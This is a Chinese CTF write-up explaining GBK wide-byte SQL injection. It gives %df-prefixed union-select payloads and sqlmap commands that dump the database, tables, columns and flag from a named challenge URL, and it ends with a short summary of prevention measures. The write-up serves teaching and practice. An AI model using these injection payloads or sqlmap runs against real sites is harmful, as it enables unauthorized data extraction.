宽字节注入

GBK注射


宽字节注入

**

在使用PHP连接MySQL的时候,当设置“set
character_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入,当存在宽字节注入的时候,注入参数里带入% DF%27,即可把(%5C)吃掉,举个例子。

**


http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

当提交

id=1' and 1=1%23

时,MySQL的运行的SQL语句为

select * from user where  id ='1\' and 1=1#'

很明显这是没有注入成功的,而当我们提交

id=1%df' and 1=1%23

MySQL的运行的SQL语句为

select * from user where id ='1運' and 1=1#'

我们这里的宽字节注入是利用的MySQL的一个特性,MySQL的在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)。这就是MySQL的的特性,因为GBK是多字节编码,他认为两个字节代表一个汉字,所以%DF和后面的\也就是%5c中变成了一个汉字“运”,而“逃逸了出来。

我用了手工注入和SqlMap的工具注入,先讲一下手工注入吧

1.手工注入

接着上面的,我们继续进行注入

id=%df%27%20union%20select%201,%20database()%23

这里写图片描述
爆出数据库之后,我们继续进行注入,爆出表

id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23

这里写图片描述

接下来我们就一个试一下每一个表,在这里我就省略了哈,直接给你们看一下爆出ctf4中表的内容的过程


下面是我第一次爆表的语句

id=%df%27 union select 1,group_concat(column_name)from information_schema.columns where table_name=ctf4%23

**没想到报错了,想了很长时间,难道还是过滤字符\搞得鬼?试着把字符转换成十六进制?ctf4转16进制为0x63746634,转换网址
将ctf4转换之后再进行注入**

id=%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23

这里写图片描述

爆出了两列,下面在获取flag的内容

id=%df%27 union select 1,group_concat(flag) from ctf4%23

这里写图片描述
不出错这个应该就是了吧

2.工具注入

**注入工具我直接放过程状语从句:查询查询结果了啊
爆出当前数据库**

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db

这里写图片描述

爆出此数据库下的所有表

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover --tables

这里写图片描述

爆出ctf4下面的所有列

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 --columns

这里写图片描述

爆出旗中的内容

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 -C flag --dump

这里写图片描述
获取成功哈

  • 11
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
SQL注入和宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权的数据库操作。这可能导致数据泄露、数据篡改、绕过认证、获取系统权限等问题。 预防SQL注入的措施包括: - 使用参数化查询或预编译语句来处理数据库查询,而不是直接拼接用户输入的数据。 - 对用户输入进行严格的验证和过滤,避免将未经处理的输入直接传递给数据库查询。 - 最小化数据库用户的权限,并且仅分配最低必要的权限。 2. 宽字节注入宽字节注入是一种特定于某些数据库和编码方式的注入攻击方法。它利用了某些编码方式对特殊字符的处理不当,从而绕过了应用程序对输入进行过滤和验证的机制。攻击者可以通过插入宽字节字符来篡改SQL语句或绕过认证。 预防宽字节注入的措施包括: - 使用合适的编码方式,例如UTF-8,以避免特殊字符被误解释。 - 进行输入验证和过滤,确保特殊字符被正确处理,不会导致SQL语句的非预期解析。 - 定期更新数据库和应用程序框架,以修复已知的宽字节注入漏洞。 总的来说,要防止SQL注入和宽字节注入等安全漏洞,应该采取综合性的安全措施,包括输入验证、参数化查询、最小权限原则、使用最新版本的软件以及定期进行安全审计和漏洞扫描。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值